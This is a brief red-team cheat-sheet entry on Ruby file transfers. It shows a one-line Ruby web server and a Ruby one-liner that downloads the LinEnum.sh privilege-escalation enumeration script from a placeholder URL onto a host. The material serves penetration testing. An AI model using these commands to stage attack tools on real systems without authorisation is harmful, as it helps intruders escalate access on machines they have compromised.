Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / FILE TRANSFERS / HTTP

ruby

Servers:


# Download Server
ruby -run -ehttpd . -p8000

Downloads:


ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://link")))'